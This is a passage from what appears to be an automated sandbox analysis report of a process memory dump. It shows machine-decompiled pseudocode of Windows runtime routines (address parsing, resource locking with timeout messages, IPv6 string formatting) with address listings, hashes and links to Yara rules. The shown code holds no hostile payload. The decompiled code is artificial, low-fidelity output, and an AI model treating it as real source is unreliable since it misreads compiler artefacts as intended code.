									goto L41;
								}
								_a7 = 1;
								goto L20;
							}
						} else {
							_v12 = _v12 + 1;
							L20:
							_t179 = _t179 + 1;
							_t141 =  *_t179;
							if(_t141 == 0) {
								goto L41;
							}
							continue;
						}
						L7:
						if(_t141 == 0x3a) {
							if(_v24 > 0 || _v8 > 0) {
								goto L41;
							} else {
								_t130 = _t179 + 1;
								if( *_t130 != _t141) {
									goto L41;
								}
								_v20 = _v20 + 1;
								_t156 = 2;
								_v32 = 1;
								_v8 = _t156;
								 *((short*)(_a12 + _v20 * 2)) = 0;
								goto L34;
							}
						}
						L8:
						if(_v8 > 7) {
							goto L41;
						}
						_t142 = _t141;
						if(E00AD06BA(_t123, _t141) == 0 || _t124 == 0) {
							if(E00AD06BA(_t124, _t142) == 0 || E00AD0A5B(_t125, _t142) == 0 || _v24 > 0) {
								goto L41;
							} else {
								_t128 = 1;
								_a7 = 1;
								_v28 = _t179;
								_v16 = 1;
								_v12 = 1;
								L39:
								if(_v16 == _t128) {
									goto L20;
								}
								goto L28;
							}
						} else {
							_a7 = 0;
							_v28 = _t179;
							_v16 = 1;
							_v12 = 1;
							goto L20;
						}
					}
				}
				L1:
				_t123 = _t108 == 1;
				if(_t108 == 1) {
					goto L8;
				}
				_t128 = 1;
				goto L39;
			}

























                                                              0x00ad0b21
                                                              0x00ad0b24
                                                              0x00ad0b27
                                                              0x00ad0b2a
                                                              0x00ad0b2d
                                                              0x00ad0b30
                                                              0x00ad0b33
                                                              0x00ad0b36
                                                              0x00ad0b39
                                                              0x00ad0b3e
                                                              0x00ad0c65
                                                              0x00ad0c68
                                                              0x00ad0c6a
                                                              0x00ad0c6f
                                                              0x00afeb42
                                                              0x00000000
                                                              0x00000000
                                                              0x00afeb48
                                                              0x00afeb48
                                                              0x00ad0c75
                                                              0x00ad0c7a
                                                              0x00afeb54
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00afeb5a
                                                              0x00ad0c80
                                                              0x00ad0c84
                                                              0x00afeb98
                                                              0x00000000
                                                              0x00000000
                                                              0x00afeba6
                                                              0x00ad0cb8
                                                              0x00ad0cba
                                                              0x00ad0cd3
                                                              0x00ad0cda
                                                              0x00ad0ce4
                                                              0x00ad0ce9
                                                              0x00000000
                                                              0x00ad0cec
                                                              0x00ad0c8c
                                                              0x00afeb63
                                                              0x00000000
                                                              0x00000000
                                                              0x00afeb70
                                                              0x00afeb75
                                                              0x00afeb7d
                                                              0x00000000
                                                              0x00000000
                                                              0x00afeb8c
                                                              0x00000000
                                                              0x00afeb8c
                                                              0x00ad0c96
                                                              0x00000000
                                                              0x00000000
                                                              0x00ad0ca2
                                                              0x00ad0cac
                                                              0x00ad0cb4
                                                              0x00000000
                                                              0x00000000
                                                              0x00ad0b44
                                                              0x00ad0b47
                                                              0x00ad0b49
                                                              0x00000000
                                                              0x00000000
                                                              0x00ad0b4f
                                                              0x00ad0b50
                                                              0x00000000
                                                              0x00000000
                                                              0x00ad0b56
                                                              0x00ad0b62
                                                              0x00ad0b7c
                                                              0x00ad0bac
                                                              0x00ad0a0f
                                                              0x00afeaaa
                                                              0x00000000
                                                              0x00afeac4
                                                              0x00afeac4
                                                              0x00ad0bd0
                                                              0x00ad0bd0
                                                              0x00ad0bd4
                                                              0x00ad0bd9
                                                              0x00000000
                                                              0x00000000
                                                              0x00ad0bdb
                                                              0x00ad0be0
                                                              0x00afeb0e
                                                              0x00ad0a1a
                                                              0x00000000
                                                              0x00ad0a1a
                                                              0x00afeb1a
                                                              0x00afeb1f
                                                              0x00afeb27
                                                              0x00000000
                                                              0x00000000
                                                              0x00afeb36
                                                              0x00000000
                                                              0x00afeb36
                                                              0x00ad0bea
                                                              0x00000000
                                                              0x00000000
                                                              0x00ad0bf6
                                                              0x00ad0c00
                                                              0x00ad0c03
                                                              0x00ad0c0b
                                                              0x00000000
                                                              0x00ad0c0b
                                                              0x00afeaaa
                                                              0x00000000
                                                              0x00ad0a15
                                                              0x00ad0bb6
                                                              0x00000000
                                                              0x00ad0bc6
                                                              0x00ad0bc6
                                                              0x00ad0bcb
                                                              0x00ad0c15
                                                              0x00000000
                                                              0x00000000
                                                              0x00ad0c1d
                                                              0x00ad0c20
                                                              0x00ad0c21
                                                              0x00ad0c24
                                                              0x00ad0c24
                                                              0x00ad0c26
                                                              0x00000000
                                                              0x00ad0c26
                                                              0x00ad0bcd
                                                              0x00000000
                                                              0x00ad0bcd
                                                              0x00ad0b89
                                                              0x00ad0b89
                                                              0x00ad0b90
                                                              0x00000000
                                                              0x00000000
                                                              0x00ad0b96
                                                              0x00000000
                                                              0x00ad0b96
                                                              0x00ad0a04
                                                              0x00ad0a04
                                                              0x00ad0b9a
                                                              0x00ad0b9a
                                                              0x00ad0b9b
                                                              0x00ad0b9f
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00ad0ba5
                                                              0x00ad0ac7
                                                              0x00ad0aca
                                                              0x00afeacf
                                                              0x00000000
                                                              0x00afeade
                                                              0x00afeade
                                                              0x00afeae3
                                                              0x00000000
                                                              0x00000000
                                                              0x00afeaf3
                                                              0x00afeaf6
                                                              0x00afeaf7
                                                              0x00afeafe
                                                              0x00afeb01
                                                              0x00000000
                                                              0x00afeb01
                                                              0x00afeacf
                                                              0x00ad0ad0
                                                              0x00ad0ad4
                                                              0x00000000
                                                              0x00000000
                                                              0x00ad0ada
                                                              0x00ad0ae6
                                                              0x00ad0c34
                                                              0x00000000
                                                              0x00ad0c47
                                                              0x00ad0c49
                                                              0x00ad0c4a
                                                              0x00ad0c4e
                                                              0x00ad0c51
                                                              0x00ad0c54
                                                              0x00ad0c57
                                                              0x00ad0c5a
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00ad0c60
                                                              0x00ad0afb
                                                              0x00ad0afe
                                                              0x00ad0b02
                                                              0x00ad0b05
                                                              0x00ad0b08
                                                              0x00000000
                                                              0x00ad0b08
                                                              0x00ad0ae6
                                                              0x00ad0b44
                                                              0x00ad09f8
                                                              0x00ad09f8
                                                              0x00ad09f9
                                                              0x00000000
                                                              0x00000000
                                                              0x00afeaa0
                                                              0x00000000

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2344141769.0000000000A80000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                              • Associated: 00000007.00000002.2344136748.0000000000A70000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344242690.0000000000B60000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344249896.0000000000B70000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344257705.0000000000B74000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344263581.0000000000B77000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344275659.0000000000B80000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344323111.0000000000BE0000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: __fassign
                                                              • String ID: .$:$:
                                                              • API String ID: 3965848254-2308638275
                                                              • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                              • Instruction ID: e01486372bba3c26e3e4b224a0d344bfc58651747f18ffa6e45564a73dcbd73b
                                                              • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                              • Instruction Fuzzy Hash: 43A18871A1430AEFCB24CFA4C845BFEB7B4AF45305F24856BE853A7392D6349A41CB52
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00AD0554, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 49%
                                                              			E00AD0554(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int* _t49;
				signed int _t51;
				signed int _t56;
				signed int _t58;
				signed int _t61;
				signed int _t63;
				void* _t66;
				intOrPtr _t67;
				signed int _t70;
				void* _t75;
				signed int _t81;
				signed int _t84;
				void* _t86;
				signed int _t93;
				signed int _t96;
				intOrPtr _t105;
				signed int _t107;
				void* _t110;
				signed int _t115;
				signed int* _t119;
				void* _t125;
				void* _t126;
				signed int _t128;
				signed int _t130;
				signed int _t138;
				signed int _t144;
				void* _t158;
				void* _t159;
				void* _t160;

				_t96 = _a4;
				_t115 =  *(_t96 + 0x28);
				_push(_t138);
				if(_t115 < 0) {
					_t105 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
						goto L6;
					} else {
						__eflags = _t115 | 0xffffffff;
						asm("lock xadd [eax], edx");
						return 1;
					}
				} else {
					L6:
					_push(_t128);
					while(1) {
						L7:
						__eflags = _t115;
						if(_t115 >= 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
							_t49 = _t96 + 0x1c;
							_t106 = 1;
							asm("lock xadd [edx], ecx");
							_t115 =  *(_t96 + 0x28);
							__eflags = _t115;
							if(_t115 < 0) {
								L23:
								_t130 = 0;
								__eflags = 0;
								while(1) {
									_t118 =  *(_t96 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x00b701c0;
									_push(_t144);
									_push(0);
									_t51 = E00A8F8CC( *((intOrPtr*)(_t96 + 0x18)));
									__eflags = _t51 - 0x102;
									if(_t51 != 0x102) {
										break;
									}
									_t106 =  *(_t144 + 4);
									_t126 =  *_t144;
									_t86 = E00AD4FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
									_push(_t126);
									_push(_t86);
									E00AE3F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
									E00AE3F92(0x65, 0, "RTL: Resource at %p\n", _t96);
									_t130 = _t130 + 1;
									_t160 = _t158 + 0x28;
									__eflags = _t130 - 2;
									if(__eflags > 0) {
										E00B1217A(_t106, __eflags, _t96);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E00AE3F92();
									_t158 = _t160 + 0xc;
								}
								__eflags = _t51;
								if(__eflags < 0) {
									_push(_t51);
									E00AD3915(_t96, _t106, _t118, _t130, _t144, __eflags);
									asm("int3");
									while(1) {
										L32:
										__eflags = _a8;
										if(_a8 == 0) {
											break;
										}
										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
										_t119 = _t96 + 0x24;
										_t107 = 1;
										asm("lock xadd [eax], ecx");
										_t56 =  *(_t96 + 0x28);
										_a4 = _t56;
										__eflags = _t56;
										if(_t56 != 0) {
											L40:
											_t128 = 0;
											__eflags = 0;
											while(1) {
												_t121 =  *(_t96 + 0x30) & 0x00000001;
												asm("sbb esi, esi");
												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x00b701c0;
												_push(_t138);
												_push(0);
												_t58 = E00A8F8CC( *((intOrPtr*)(_t96 + 0x20)));
												__eflags = _t58 - 0x102;
												if(_t58 != 0x102) {
													break;
												}
												_t107 =  *(_t138 + 4);
												_t125 =  *_t138;
												_t75 = E00AD4FC0(_t125, _t107, 0xff676980, 0xffffffff);
												_push(_t125);
												_push(_t75);
												E00AE3F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
												E00AE3F92(0x65, 0, "RTL: Resource at %p\n", _t96);
												_t128 = _t128 + 1;
												_t159 = _t158 + 0x28;
												__eflags = _t128 - 2;
												if(__eflags > 0) {
													E00B1217A(_t107, __eflags, _t96);
												}
												_push("RTL: Re-Waiting\n");
												_push(0);
												_push(0x65);
												E00AE3F92();
												_t158 = _t159 + 0xc;
											}
											__eflags = _t58;
											if(__eflags < 0) {
												_push(_t58);
												E00AD3915(_t96, _t107, _t121, _t128, _t138, __eflags);
												asm("int3");
												_t61 =  *_t107;
												 *_t107 = 0;
												__eflags = _t61;
												if(_t61 == 0) {
													L1:
													_t63 = E00AB5384(_t138 + 0x24);
													if(_t63 != 0) {
														goto L52;
													} else {
														goto L2;
													}
												} else {
													_t123 =  *((intOrPtr*)(_t138 + 0x18));
													_push( &_a4);
													_push(_t61);
													_t70 = E00A8F970( *((intOrPtr*)(_t138 + 0x18)));
													__eflags = _t70;
													if(__eflags >= 0) {
														goto L1;
													} else {
														_push(_t70);
														E00AD3915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
														L52:
														_t122 =  *((intOrPtr*)(_t138 + 0x20));
														_push( &_a4);
														_push(1);
														_t63 = E00A8F970( *((intOrPtr*)(_t138 + 0x20)));
														__eflags = _t63;
														if(__eflags >= 0) {
															L2:
															return _t63;
														} else {
															_push(_t63);
															E00AD3915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
															_t109 =  *((intOrPtr*)(_t138 + 0x20));
															_push( &_a4);
															_push(1);
															_t63 = E00A8F970( *((intOrPtr*)(_t138 + 0x20)));
															__eflags = _t63;
															if(__eflags >= 0) {
																goto L2;
															} else {
																_push(_t63);
																_t66 = E00AD3915(_t96, _t109, _t122, _t128, _t138, __eflags);
																asm("int3");
																while(1) {
																	_t110 = _t66;
																	__eflags = _t66 - 1;
																	if(_t66 != 1) {
																		break;
																	}
																	_t128 = _t128 | 0xffffffff;
																	_t66 = _t110;
																	asm("lock cmpxchg [ebx], edi");
																	__eflags = _t66 - _t110;
																	if(_t66 != _t110) {
																		continue;
																	} else {
																		_t67 =  *[fs:0x18];
																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
																		return _t67;
																	}
																	goto L58;
																}
																E00AB5329(_t110, _t138);
																return E00AB53A5(_t138, 1);
															}
														}
													}
												}
											} else {
												_t56 =  *(_t96 + 0x28);
												goto L3;
											}
										} else {
											_t107 =  *_t119;
											__eflags = _t107;
											if(__eflags > 0) {
												while(1) {
													_t81 = _t107;
													asm("lock cmpxchg [edi], esi");
													__eflags = _t81 - _t107;
													if(_t81 == _t107) {
														break;
													}
													_t107 = _t81;
													__eflags = _t81;
													if(_t81 > 0) {
														continue;
													}
													break;
												}
												_t56 = _a4;
												__eflags = _t107;
											}
											if(__eflags != 0) {
												while(1) {
													L3:
													__eflags = _t56;
													if(_t56 != 0) {
														goto L32;
													}
													_t107 = _t107 | 0xffffffff;
													_t56 = 0;
													asm("lock cmpxchg [edx], ecx");
													__eflags = 0;
													if(0 != 0) {
														continue;
													} else {
														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
														return 1;
													}
													goto L58;
												}
												continue;
											} else {
												goto L40;
											}
										}
										goto L58;
									}
									__eflags = 0;
									return 0;
								} else {
									_t115 =  *(_t96 + 0x28);
									continue;
								}
							} else {
								_t106 =  *_t49;
								__eflags = _t106;
								if(__eflags > 0) {
									while(1) {
										_t93 = _t106;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t93 - _t106;
										if(_t93 == _t106) {
											break;
										}
										_t106 = _t93;
										__eflags = _t93;
										if(_t93 > 0) {
											continue;
										}
										break;
									}
									__eflags = _t106;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L23;
								}
							}
						}
						goto L58;
					}
					_t84 = _t115;
					asm("lock cmpxchg [esi], ecx");
					__eflags = _t84 - _t115;
					if(_t84 != _t115) {
						_t115 = _t84;
						goto L7;
					} else {
						return 1;
					}
				}
				L58:
			}



































                                                              0x00ad055a
                                                              0x00ad055d
                                                              0x00ad0563
                                                              0x00ad0566
                                                              0x00ad05d8
                                                              0x00ad05e2
                                                              0x00ad05e5
                                                              0x00000000
                                                              0x00ad05e7
                                                              0x00ad05e7
                                                              0x00ad05ea
                                                              0x00ad05f3
                                                              0x00ad05f3
                                                              0x00ad0568
                                                              0x00ad0568
                                                              0x00ad0568
                                                              0x00ad0569
                                                              0x00ad0569
                                                              0x00ad0569
                                                              0x00ad056b
                                                              0x00000000
                                                              0x00000000
                                                              0x00af217f
                                                              0x00af2183
                                                              0x00af225b
                                                              0x00af225f
                                                              0x00af2189
                                                              0x00af218c
                                                              0x00af218f
                                                              0x00af2194
                                                              0x00af2199
                                                              0x00af219d
                                                              0x00af21a0
                                                              0x00af21a2
                                                              0x00af21ce
                                                              0x00af21ce
                                                              0x00af21ce
                                                              0x00af21d0
                                                              0x00af21d6
                                                              0x00af21de
                                                              0x00af21e2
                                                              0x00af21e8
                                                              0x00af21e9
                                                              0x00af21ec
                                                              0x00af21f1
                                                              0x00af21f6
                                                              0x00000000
                                                              0x00000000
                                                              0x00af21f8
                                                              0x00af21fb
                                                              0x00af2206
                                                              0x00af220b
                                                              0x00af220c
                                                              0x00af2217
                                                              0x00af2226
                                                              0x00af222b
                                                              0x00af222c
                                                              0x00af222f
                                                              0x00af2232
                                                              0x00af2235
                                                              0x00af2235
                                                              0x00af223a
                                                              0x00af223f
                                                              0x00af2241
                                                              0x00af2243
                                                              0x00af2248
                                                              0x00af2248
                                                              0x00af224d
                                                              0x00af224f
                                                              0x00af2262
                                                              0x00af2263
                                                              0x00af2268
                                                              0x00af2269
                                                              0x00af2269
                                                              0x00af2269
                                                              0x00af226d
                                                              0x00000000
                                                              0x00000000
                                                              0x00af2276
                                                              0x00af2279
                                                              0x00af227e
                                                              0x00af2283
                                                              0x00af2287
                                                              0x00af228a
                                                              0x00af228d
                                                              0x00af228f
                                                              0x00af22bc
                                                              0x00af22bc
                                                              0x00af22bc
                                                              0x00af22be
                                                              0x00af22c4
                                                              0x00af22cc
                                                              0x00af22d0
                                                              0x00af22d6
                                                              0x00af22d7
                                                              0x00af22da
                                                              0x00af22df
                                                              0x00af22e4
                                                              0x00000000
                                                              0x00000000
                                                              0x00af22e6
                                                              0x00af22e9
                                                              0x00af22f4
                                                              0x00af22f9
                                                              0x00af22fa
                                                              0x00af2305
                                                              0x00af2314
                                                              0x00af2319
                                                              0x00af231a
                                                              0x00af231d
                                                              0x00af2320
                                                              0x00af2323
                                                              0x00af2323
                                                              0x00af2328
                                                              0x00af232d
                                                              0x00af232f
                                                              0x00af2331
                                                              0x00af2336
                                                              0x00af2336
                                                              0x00af233b
                                                              0x00af233d
                                                              0x00af2350
                                                              0x00af2351
                                                              0x00af2356
                                                              0x00af2359
                                                              0x00af2359
                                                              0x00af235b
                                                              0x00af235d
                                                              0x00ab5367
                                                              0x00ab536b
                                                              0x00ab5372
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00af2363
                                                              0x00af2363
                                                              0x00af2369
                                                              0x00af236a
                                                              0x00af236c
                                                              0x00af2371
                                                              0x00af2373
                                                              0x00000000
                                                              0x00af2379
                                                              0x00af2379
                                                              0x00af237a
                                                              0x00af237f
                                                              0x00af237f
                                                              0x00af2385
                                                              0x00af2386
                                                              0x00af2389
                                                              0x00af238e
                                                              0x00af2390
                                                              0x00ab5378
                                                              0x00ab537c
                                                              0x00af2396
                                                              0x00af2396
                                                              0x00af2397
                                                              0x00af239c
                                                              0x00af23a2
                                                              0x00af23a3
                                                              0x00af23a6
                                                              0x00af23ab
                                                              0x00af23ad
                                                              0x00000000
                                                              0x00af23b3
                                                              0x00af23b3
                                                              0x00af23b4
                                                              0x00af23b9
                                                              0x00af23ba
                                                              0x00af23ba
                                                              0x00af23bc
                                                              0x00af23bf
                                                              0x00000000
                                                              0x00000000
                                                              0x00ae9153
                                                              0x00ae9158
                                                              0x00ae915a
                                                              0x00ae915e
                                                              0x00ae9160
                                                              0x00000000
                                                              0x00ae9166
                                                              0x00ae9166
                                                              0x00ae9171
                                                              0x00ae9176
                                                              0x00ae9176
                                                              0x00000000
                                                              0x00ae9160
                                                              0x00af23c6
                                                              0x00af23d7
                                                              0x00af23d7
                                                              0x00af23ad
                                                              0x00af2390
                                                              0x00af2373
                                                              0x00af233f
                                                              0x00af233f
                                                              0x00000000
                                                              0x00af233f
                                                              0x00af2291
                                                              0x00af2291
                                                              0x00af2293
                                                              0x00af2295
                                                              0x00af229a
                                                              0x00af22a1
                                                              0x00af22a3
                                                              0x00af22a7
                                                              0x00af22a9
                                                              0x00000000
                                                              0x00000000
                                                              0x00af22ab
                                                              0x00af22ad
                                                              0x00af22af
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00af22af
                                                              0x00af22b1
                                                              0x00af22b4
                                                              0x00af22b4
                                                              0x00af22b6
                                                              0x00ab53be
                                                              0x00ab53be
                                                              0x00ab53be
                                                              0x00ab53c0
                                                              0x00000000
                                                              0x00000000
                                                              0x00ab53cb
                                                              0x00ab53ce
                                                              0x00ab53d0
                                                              0x00ab53d4
                                                              0x00ab53d6
                                                              0x00000000
                                                              0x00ab53d8
                                                              0x00ab53e3
                                                              0x00ab53ea
                                                              0x00ab53ea
                                                              0x00000000
                                                              0x00ab53d6
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00af22b6
                                                              0x00000000
                                                              0x00af228f
                                                              0x00af2349
                                                              0x00af234d
                                                              0x00af2251
                                                              0x00af2251
                                                              0x00000000
                                                              0x00af2251
                                                              0x00af21a4
                                                              0x00af21a4
                                                              0x00af21a6
                                                              0x00af21a8
                                                              0x00af21ac
                                                              0x00af21b6
                                                              0x00af21b8
                                                              0x00af21bc
                                                              0x00af21be
                                                              0x00000000
                                                              0x00000000
                                                              0x00af21c0
                                                              0x00af21c2
                                                              0x00af21c4
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00af21c4
                                                              0x00af21c6
                                                              0x00af21c6
                                                              0x00af21c8
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00af21c8
                                                              0x00af21a2
                                                              0x00000000
                                                              0x00af2183
                                                              0x00ad057b
                                                              0x00ad057d
                                                              0x00ad0581
                                                              0x00ad0583
                                                              0x00af2178
                                                              0x00000000
                                                              0x00ad0589
                                                              0x00ad058f
                                                              0x00ad058f
                                                              0x00ad0583
                                                              0x00000000

                                                              APIs
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AF2206
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2344141769.0000000000A80000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                              • Associated: 00000007.00000002.2344136748.0000000000A70000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344242690.0000000000B60000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344249896.0000000000B70000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344257705.0000000000B74000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344263581.0000000000B77000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344275659.0000000000B80000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344323111.0000000000BE0000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                              • API String ID: 885266447-4236105082
                                                              • Opcode ID: 3ec43cd313f5ea90dd84a8204071e69fa0e223610f7f33fa4eaacde822dc4bc1
                                                              • Instruction ID: f89bb168b73f8f71d7174dc67c4b90296179cf8e094259e946654f41a3dbd64c
                                                              • Opcode Fuzzy Hash: 3ec43cd313f5ea90dd84a8204071e69fa0e223610f7f33fa4eaacde822dc4bc1
                                                              • Instruction Fuzzy Hash: AF512B727002056FDF14CB59CC81FB633A9AF98710F218269FE59DF285DA71EC418794
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00AD14C0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 64%
                                                              			E00AD14C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				char _v10;
				char _v140;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				void* _t26;
				signed int _t29;
				signed int _t34;
				signed int _t40;
				intOrPtr _t45;
				void* _t51;
				intOrPtr* _t52;
				void* _t54;
				signed int _t57;
				void* _t58;

				_t51 = __edx;
				_t24 =  *0xb72088; // 0x776dd4b6
				_v8 = _t24 ^ _t57;
				_t45 = _a16;
				_t53 = _a4;
				_t52 = _a20;
				if(_a4 == 0 || _t52 == 0) {
					L10:
					_t26 = 0xc000000d;
				} else {
					if(_t45 == 0) {
						if( *_t52 == _t45) {
							goto L3;
						} else {
							goto L10;
						}
					} else {
						L3:
						_t28 =  &_v140;
						if(_a12 != 0) {
							_push("[");
							_push(0x41);
							_push( &_v140);
							_t29 = E00AC7707();
							_t58 = _t58 + 0xc;
							_t28 = _t57 + _t29 * 2 - 0x88;
						}
						_t54 = E00AD13CB(_t53, _t28);
						if(_a8 != 0) {
							_t34 = E00AC7707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t34 * 2;
						}
						if(_a12 != 0) {
							_t40 = E00AC7707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t40 * 2;
						}
						_t53 = (_t54 -  &_v140 >> 1) + 1;
						 *_t52 = _t53;
						if( *_t52 < _t53) {
							goto L10;
						} else {
							E00A92340(_t45,  &_v140, _t53 + _t53);
							_t26 = 0;
						}
					}
				}
				return E00A9E1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
			}




















                                                              0x00ad14c0
                                                              0x00ad14cb
                                                              0x00ad14d2
                                                              0x00ad14d6
                                                              0x00ad14da
                                                              0x00ad14de
                                                              0x00ad14e3
                                                              0x00ad157a
                                                              0x00ad157a
                                                              0x00ad14f1
                                                              0x00ad14f3
                                                              0x00afea0f
                                                              0x00000000
                                                              0x00afea15
                                                              0x00000000
                                                              0x00afea15
                                                              0x00ad14f9
                                                              0x00ad14f9
                                                              0x00ad14fe
                                                              0x00ad1504
                                                              0x00afea1a
                                                              0x00afea1f
                                                              0x00afea21
                                                              0x00afea22
                                                              0x00afea27
                                                              0x00afea2a
                                                              0x00afea2a
                                                              0x00ad1515
                                                              0x00ad1517
                                                              0x00ad156d
                                                              0x00ad1572
                                                              0x00ad1575
                                                              0x00ad1575
                                                              0x00ad151e
                                                              0x00afea50
                                                              0x00afea55
                                                              0x00afea58
                                                              0x00afea58
                                                              0x00ad152e
                                                              0x00ad1531
                                                              0x00ad1533
                                                              0x00000000
                                                              0x00ad1535
                                                              0x00ad1541
                                                              0x00ad1549
                                                              0x00ad1549
                                                              0x00ad1533
                                                              0x00ad14f3
                                                              0x00ad1559

                                                              APIs
                                                              • ___swprintf_l.LIBCMT ref: 00AFEA22
                                                                • Part of subcall function 00AD13CB: ___swprintf_l.LIBCMT ref: 00AD146B
                                                                • Part of subcall function 00AD13CB: ___swprintf_l.LIBCMT ref: 00AD1490
                                                              • ___swprintf_l.LIBCMT ref: 00AD156D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2344141769.0000000000A80000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                              • Associated: 00000007.00000002.2344136748.0000000000A70000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344242690.0000000000B60000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344249896.0000000000B70000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344257705.0000000000B74000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344263581.0000000000B77000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344275659.0000000000B80000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344323111.0000000000BE0000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: %%%u$]:%u
                                                              • API String ID: 48624451-3050659472
                                                              • Opcode ID: 9e554ad090064d07cbae9548f5001f6616bf3d60bcec0da39ec003d9d06d9e06
                                                              • Instruction ID: 52245cb2697849116c7b7105d5258c927a55211533dad7c08a6bff19bce6b901
                                                              • Opcode Fuzzy Hash: 9e554ad090064d07cbae9548f5001f6616bf3d60bcec0da39ec003d9d06d9e06
                                                              • Instruction Fuzzy Hash: 1F21B172A00219BBCF20DF68DD41AEF73BCBB50700F444516F946D3241DB799A588BE0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00AB53A5, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 44%
                                                              			E00AB53A5(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
				signed int _t37;
				signed int _t40;
				signed int _t42;
				void* _t45;
				intOrPtr _t46;
				signed int _t49;
				void* _t51;
				signed int _t57;
				signed int _t64;
				signed int _t71;
				void* _t74;
				intOrPtr _t78;
				signed int* _t79;
				void* _t85;
				signed int _t86;
				signed int _t92;
				void* _t104;
